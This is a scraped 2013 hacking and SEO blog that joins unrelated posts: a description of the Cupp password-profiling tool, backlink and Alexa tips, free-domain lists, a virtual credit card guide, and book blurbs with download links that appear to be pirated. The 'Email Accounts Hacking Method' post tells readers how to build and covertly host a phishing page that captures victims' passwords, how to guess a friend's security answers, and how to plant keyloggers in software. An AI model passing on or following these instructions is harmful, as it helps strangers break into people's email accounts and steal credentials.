http://www.youtube.com/watch?v=GoSzXtKGU9o

DOWNLOAD LINK:       LINK 1

Cupp (Common User Passwords Profiler)





Cupp is a common user password profiler. Using this script we can make our own dictionary on someone profiling such as a birthday, nickname, address, name of a pet or relative, or some common works like god, love, money, or any different passwords.

Options:

-h You are looking at it baby! :)
For more help take a look in docs/README
Global configuration file is cupp.cfg


-i Interactive questions for user password profiling

-w Use this option to improve existing dictionary, or WyD.pl output to make some pwnsauce

-l Download huge wordlists from repository

-a Parse default usernames and passwords directly from Alecto DB.
Project Alecto uses purified databases of Phenoelit and CIRT which where merged and enhanced.


-v Version of the program


VIDEO TUTORIAL:
http://www.youtube.com/watch?v=U0kAE3uj4Qs


DOWNLOAD LINK:    LINK 1

Get 5000 Free Backlinks For Your Website Or Blog Instantly !

I am here with new trick to getfree backlinks for your blog or website. Backlinks play very important role to get " High PR ranking " and " Alexa High Ranking " for free.

Yes, its true that if you have a website or blog and not having " Enough Traffic" and want to get " Good PR ranking " and " Alexa High Ranking" then this method will work for you easily and that too free also. By using this method you will see change in " Alexa Ranking " easily with in four days.


It is true that the back bone of a websites rank is ‘ Backlinks ’. If you have good backlinks then your blog is expected to do good in SEO.The problem is that backlinks are not easy as making oatmeal, it can take you forever to make ton of backlinks So you have to be patient while doing this. There are many ways to get backlinks, such as: Social bookmarking, Blog commenting, Forum posting and article submission.

Get Free Backlink For Website Instantly


I have applied all the below listed methods to " Get Premium Backlinks " for free . So don't worry! this all methods are working very fine


Generate automatic Backlinks – There are several sites which allow free auto backlinks service. Some of them are


1. Freesitescripts.com – About 1000 Premium Backlinks For Free
2. IMTalk – About 2500 Premium Backlinks For Free
3. Webmasterdeck – 500 Premium Backlinks For Free

I hope you like this methods though some tells that this " BlackHat SEO Method To Get High Ranking " but according to me this is Ethical method to " Get Free Backlinks "


Thankyou for reading this article and don't forget to comment..


keywords:-
search engine optimization, backlinks, get free backlinks, free backlinks, how to get free backlinks for website, seo, blackhat seo,whitehat seo.

10 Killer Ways To Boost Your Alexa Ranking | SEO Tricks !

Hi friends I hope you all are fine, After my previous post for " How To Recover Lost Data With Recuva For Computer " . I am here as promised with " new tricks " . This trick is related to SEO . Today I am going to post a review about alexa and " How To Increase Alexa Ranking " . This all methods are provened by webmaster and also checked by me

Alexa is a service that ranks websites based on information gathered from the web. For webmasters, it is very important to improve Alexa Ranking. I am presenting a list of 10 easy tips to improve position(rank) on Alexa.
As Per Alexa Notice
Alexa’s traffic rankings are based on the usage patterns of Alexa Toolbar users and data collected from other, diverse sources over a rolling 3 month period. A site’s ranking is based on a combined measure of reach and pageviews. Reach is determined by the number of unique Alexa users who visit a site on a given day. Pageviews are the total number of Alexa user URL requests for a site
Follow These Killer Tips To Increase Alexa Rank



1- Download And Install Alexa Toolbar
2-Put an Alexa rank widget on your blog/ website.
3- Install Alexa Redirect Plugin for WordPress.
4- Visit to the Alexa website and claim your website to get maximum authority
5- Write an article about Alexa in your blog with a link to their site.
6- Get Dugg or Stumbled. This will bring a numbers of visitors to your blog
7- Set your Blog as home page in your default web browser
8- Get your blog / website listed in as many number of blog directories as possible.
9- Popular webmaster forums are great promotion tools
10- Encourage or ask some of your friends or visitors to install Alexa toolbar So follow all above steps 11- which will definitely help you to increase your Alexa traffic ranking and thus the value of your blog in the eyes of a advertisers. Please add any other ways to increase the Alexa Rank if you feel I have missed something.

Monday, December 2, 2013

The Art of Deception {TOP HACKING BOOK EVER} MUST DOWNLOAD !

Kevin Mitnick's exploits as a cyber-desperado and fugitive from one of the most exhaustive FBI manhunts in history have spawned dozens of articles, books, films, and documentaries. Since his release from federal prison in 2000, Mitnick has turned his life around and established himself as one of the most sought-after computer security experts worldwide. Now, in The Art Of Deception, the world's most famous hacker gives new meaning to the old adage, "It takes a thief to catch a thief."



Inviting you into the complex mind of the hacker, Mitnick provides realistic scenarios of cons, swindles, and social engineering attacks on business - and the consequences. Focusing on the human factors involved with information security, Mitnick explains why all the firewalls and encryption protocols in the world will never be enough to stop a savvy grifter intent on rifling a corporate database or an irate employee determined to crash a system. He illustrates just how susceptible even the most locked-down information systems are to a determined con artist impersonating an IRS agent or any other seemingly innocent character. Narrated from the points of view of both the attacker and the victim,

The Art Of Deception explores why each attack was so successful - and how it could have been averted - in an engaging and highly readable manner reminiscent of a true-crime novel.

Most importantly, Mitnick redeems his former life of crime by providing specific guidelines for developing protocols, training programs, and manuals to ensure that a company's sophisticated technical security investment will not be for naught. He shares his advice for preventing security vulnerability in the hope that people will be mindfully on guard for an attack from the gravest risk of all - human nature.



Download:          LINK 1

Mozilla Firefox 13 Hits Release Channel, Brings New Homepage and Tabs !


The latest and greatest version of Mozilla's Firefox web browser -- Firefox 13 -- doesn't alter the browser scene with earth shaking innovation or groundbreaking feature additions, nor have we come to expect such gargantuan leaps in browser development since Mozilla swithced to a rapid release schedule. That said, there is a new version of Firefox on the Release channel, and here's what it brings to the table.
First and foremost, Firefox's new default homepage offers quicker access to bookmarks, history, settings, and more. The other notable change has to do with tabs. When opening a new tab, Firefox presents users with their most visited pages.
Other than those two additions, Mozilla mainly just sprinkled in a few changes to how the browser behaves and resolved a bunch of bugs, as it usually does with each new Firefox release. Restored background tabs are no longer loaded by default, a move intended to speed up the startup process, and smooth scrolling is now enabled by default. On the developer side, Mozilla said it made 72 total improvements to Page Inspector, HTML panel, Style Inspector, Scratchpad, and Style Editor.
The complete list of changes is here, and you can download the latest Firefox release here.


How to get your website ranked on search engines | Amit Khajuria


There are many factors involved in getting your website ranking on search engines. Below are some key things to take into consideration, and we hope that it will help you to increase traffic on your blog website or forum :)

Anchor text
The anchor text of inbound links coming to your website is very important as search engines use this to determine what your site is about and what it should rank well for. Your anchor text should be your keywords that you want your website to rank for. For example, instead of using your company name or your website URL for inbound links, consider using keywords as your anchor text.



Use keywords in your title tag and other meta tags
Meta tags still have an impact on where your website will rank on search engines. The weight of the meta tags may be minimal, but it is still recommended that you choose keywords relevant to each webpage. It is an effective way for search engines to categorise your webpages and gives search engine spiders an idea of what your webpage is about.



Links to your website
The largest factor that influences search engine rankings is the number and quality of links that are pointing to your website. The more quality links that you have coming to your website, search engines will think your website has authority.
Keyword use in the root domain
Although it's possible to use subdomain or dedicated pages to get your keywords in a URL, nothing beats having your keywords in your domain name. For example, goldcoastaccommodation.com.au.
Apply the proper tags to your page
This means using H1, H2, and H3 tags in your headings and sub-headings.



Include a html sitemap and an xml sitemap on your website
Including a sitemap on your website makes it easy for search engine spiders to access all your webpages and index your site accordingly.



Make sure all images have an ALT text
Your image alt text is read by search engine spiders, so make sure you include keywords in your alt text. Label your images properly too, for example, instead of calling it bedroom.jpg, call it melbourne-accommodation-1-bedroom-apartments.jpg.


Source

Free Domain Names | Get Professional Domains For Free With All Features !

Below are the websites which provides " Free Domain Hosting " for your blog. This all listed below website provides the features and benefits which a professional .com domain hosting website provides . So watch carefully these website and have your register their for free.

CC.CC


CC.CC offers simple, memorable custom domain for Google Apps, Blogger, etc..
This site provides the domain name registration tools and DNS setup wizard.
You can configure your .cc.cc Domain for Blogger, Gmail, Google sites, Tumblr, Bandcamp, Hotmail, Facebook, Twitter, Myspace, etc.. The service is provided at no cost, no ads. Enjoy our free service!

CO.CC

CO.CC offers simple, memorable custom domain for Google Apps, Blogger, etc.. This site provides the domain name registration tools and DNS setup wizard.

You can configure your .cc.cc Domain for Blogger, Gmail, Google sites, Tumblr, Bandcamp, Hotmail, Facebook, Twitter, Myspace, etc.. The service is provided at no cost, no ads. Enjoy our free service!

CZ.CC

CZ.CC provides free domain regsitration service. You can register all available domain names instantly. They offers free or paid dynamic dns service with full MX, CNAME, A and SOA records. The service they provide is exactly same as .co.cc. Register on .cz.cc

CO.TV

co.tv is strong yet free domain registration service provider. You are limited upto 3 domains with single user account. Like .co.cc, .co.tv also supports full MX, CNAME, A and SOA records. Register on co.tv




CO.NR

co.nr has free domain name package was designed to provide domain name free, subdomain services mainly for advanced internet users, who have some basic knowledge about the DNS (Domain Name
System) and process of setting up name serversas well as other DNS records (NS, A, MX, CNAME, TXT, etc.) for the domain name to work properly. Also it provides subdomain hosting, i.e. subdomain.domain.co.nr

SmartDots.com

Smartdots.com is one of them who provide variety of domain names. One of the famous domain people owns from smartdots is .net.tc. Besides these you can have other domain names listed in their
website. They supports variety of features, like meta tag generator, automatic search engine submission, etc. To know more about their features visit them.

CyDots.com

CyDots.com is one of them who provide variety of domain names. One of the famous domainpeople owns from smartdots is .net.tc. Besides these you can have other domain names listed in their website. They supports variety of features, like meta tag generator, automatic search engine submission, etc. To know more about their features visit them.

How to Use Google Search Via SMS in India !

Yeah, now you can also search anything, anytime, anywhere on Google without a internet connection. Google on your mobile either it’s a Smartphone or low cost phone it will help you with his SMS service. You don’t need to buy a expensive phone’s out of your budget to just surf for internet on the go.

Please follow the following step:-

1. You have to just type your keywords (You want to search) in your phone message box (create message).


2.Then add receipt send it to 9773300000. And it will comeback you the answer within a few seconds.

3. You will feel like you are surfing Google on the Internet.

It helps me when I went to Delhi with friends at late night and we have to search for movie Showtime’s. Then I messaged on that number movie Delhi. And I stunned, got minimum 12-13 messages about movies Showtime’s or ratings of the movies. At different theater.

Note: Charge May Apply.

Sunday, December 1, 2013

Email Accounts Hacking Method - How To Hack Email Accounts

The Basic level Hacking is Email Account Hacking. Everyone like to do first email account hacking only. So here is the tutorial for budding hackers about email Hacking.

There are different types of Email Account Hacking . Here is some of them :

  1.  Social Engineering
  2.  Phishing
  3.  Brute Force Attack
  4.  Keylogger
  5.  Guessing the Answer for the Security Question


Social Engineering:

Social engineering takes advantage of the weakest link in any organization’s
information security defenses: people. Social engineering is
“people hacking” and involves maliciously exploiting the trusting nature of
human beings to obtain information that can be used for personal gain.

Social engineering is one of the toughest hacks to perpetrate because it takes
great skill to come across as trustworthy to a stranger. It’s also by far the
toughest hack to protect against because people are involved.

Social Engineering is different from Physical Security exploits . In social engineering hackers will analyze about
victim. Hackers will send mail to victim. The contents will be related to the victim.

Eg:

✓ False support personnel claim that they need to install a patch or new
version of software on a user’s computer, talk the user into downloading
the software, and obtain remote control of the system.
✓ False vendors claim to need to update the organization’s accounting
package or phone system, ask for the administrator password, and
obtain full access.
✓ Phishing e-mails sent by external attackers gather user IDs and passwords
of unsuspecting recipients. Hackers then use those passwords to
gain access to bank accounts and more. A related attack exploits crosssite
scripting on Web forms.
✓ False employees notify the security desk that they have lost their keys
to the computer room, receive a set of keys from security, and obtain
unauthorized access to physical and electronic information.

Phishing WebPage:



It is a fake webpage which looks similar to the original page of the website. Using this WebPage we can easily get the Password of victims. The process involved in creating Phishing webpage are,
✓ First Visit the Website which is associated with the email id. Copy the Source code.
✓ Edit the the Source code such that it will store the password for you.
✓ Upload the Webpage to any free webhosting sites. (don't select a famous hosting site,they will find that
your page is fake). Try uploading through the proxy server.



Guessing the Answer for Security Question:




Do you remember that the mail sites will ask for the security questions to retrieve the mail account? You can hack the mail account simply guessing the answer. If the victim is your friend ,then it may very easy to hack.



Brute Force Attack:

                                  
A famous and traditional attacking method . In this method ,the password will be found by trying all possible passwords with any program or software.



Keyloggers:

It is one of the spyware which will capture what you type in the keyboard. so whenever you type the username and password ,it will simply capture.

It is software program which will be attached with any softwares and send to victim. While victim install the software ,the keylogger also start to work.
 



How to create Prepaid Virtual Credit Cards (VCCs) instantly

This Virtual Credit Card creation method is for Indians who does not have a valid credit card and wants to make online transactions where credit card is mandatory.

What is a Virtual Credit Card?

Virtual Credit Card (VVC) is a one-time usable credit card with a preloaded amount and comes with few months of validity. It is the safest way to pay online.

How to get these VVCs?
For this method, you need to have an HDFC Banksavings account with International Debit Card. If you have a normal debit card, apply for an International Debit Card. Visit an HDFC Bank branch nearest to you and submit a simple application for International Debit Card, which takes around a week or two to get your card. If you have not opted for online banking facility, go and get it.

You can create unlimited virtual credit cards using NetSafe by HDFC Bank. Go to thehomepage of HDFC Bank and select “NetSafe/ Verified by Visa/ MasterCard SecureCode” from the different account logins available on the homepage. It pops up a window where you can register for NetSafe using your International Debit Card.

Once you registered, login into your account and it will show your balance and option to create a virtual credit with a specified amount. Fill the amount and click “GO.” It will create a virtual credit card with expiry date, CVV, and the amount you have chosen.

Don’ts:
Do not use this virtual credit card where physical goods are delivered at your doorstep upon presentation of the card to the delivery boy.
Do not use this card where recurrent payments are made because it expires in a month or so.
Except the above, you can now use the virtual card for online payments safely.

The Benefits of Using a Virtual Card
The temporary account number you generate and use for a one time or one vendor purchase is useless to hackers. Even if a hacker obtains the account number it will not be useful to him as it cannot be used again.

Because the virtual card will have a spending limit that reflect the purchase you intend to make, your real account and full credit line are not at risk when you buy online. The temporary number does not lead to your real credit card number no matter what a hacker does.
Using a virtual card for online purchases does not expose you to the risk of identity theft that is a rising problem in the marketplace today. Identity theft relies on the ability of the thief to match various pieces of information that you have placed online. If a hacker is unable to find information that leads to your credit file or your bank account, he is unlikely to be able to use your identity.

NINJA HACKING UNCONVENTIONAL PENETRATION TESTING TACTICS AND TECHNIQUES (FREE DOWNLOAD)

Ninja Hacking Unconventional Penetration Testing Tactics and Techniques


                                                              About book

Ninja Hacking, the new book by Thomas Wilhelm and Jason Andress, is not a typical book about hacking andpenetration testing. Experienced penetration testers who want to learn cutting-edge penetration techniques will find few references to little-known penetration tools or techniques presented in bland technical format. The book doesn’t rely on pun-filled humor, either.


Ninja Hacking is targeted at individuals who have an interest in the warriors of feudal Japan and want a serious philosophical exploration on how those warrior’s techniques map into modern cyber-warfare. For penetration testers who want to know how to be Ninjas, Ninja Hacking creates a framework for becoming a feudal Japanesewarrior in cyberspace. Each chapter discusses a new piece of the puzzle, and, while you won’t achieve mastery from this book alone, the building blocks are laid that should allow an inspired reader to know what additional areas need to be researched.


DOWNLOAD LINK:       LINK 1

POSTGRESQL UP AND RUNNING

PostgreSQL up and Running



If you’re thinking about migrating to the PostgreSQL open source database system, this guide provides a concise overview to help you quickly understand and use PostgreSQL’s unique features. Not only will you learn about the enterprise class features in the 9.2 release, you’ll also discover that PostgeSQL is more than just a database system—it’s also an impressive application platform.

With numerous examples throughout this book, you’ll learn how to achieve tasks that are difficult or impossible in other databases. If you’re an existing PostgreSQL user, you’ll pick up gems you may have missed along the way.


Learn basic administration tasks, such as role management, database creation, backup, and restore
Apply the psql command-line utility and the pgAdmin graphical administration tool
Explore PostgreSQL tables, constraints, and indexes
Learn powerful SQL constructs not generally found in other databases
Use several different languages to write database functions
Tune your queries to run as fast as your hardware will allow
Query external and variegated data sources with Foreign Data Wrappers
Learn how to replicate data, using built-in replication features.


DOWNLOAD LINK:    LINK 1

STEAL THIS COMPUTER BOOK 4.0 (WHAT THEY WON'T TELL YOU ABOUT THE INTERNET)



If you thought hacking was just about mischief-makers hunched over computers in the basement, think again. As seasoned author Wallace Wang explains, hacking can also mean questioning the status quo, looking for your own truths, and never accepting at face value anything authorities say or do.


The completely revised fourth edition of this offbeat, non-technical book examines what hackers do, how they do it, and how you can protect yourself. Written in the same informative, irreverent, and entertaining style that made the first three editions hugely successful, Steal This Computer Book 4.0 will expand your mind and raise your eyebrows. New chapters discuss the hacker mentality, social engineering and lock picking, exploiting P2P file-sharing networks, and how people manipulate search engines and pop-up ads to obtain and use personal information. Wang also takes issue with the media for "hacking" the news and presenting the public with self-serving stories of questionable accuracy. Inside, you'll discover:

How to manage and fight spam and spyware How Trojan horse programs and rootkits work, and how to defend against them How hackers steal software and defeat copy-protection mechanisms How to tell if your machine is being attacked and what you can do to protect it Where the hackers are, how they probe a target and sneak into a computer, and what they do once they get inside How corporations use hacker techniques to infect your computer and invade your privacy How you can lock down your computer to protect your data and your personal information using free programs.



DOWNLOAD LINK:      LINK 1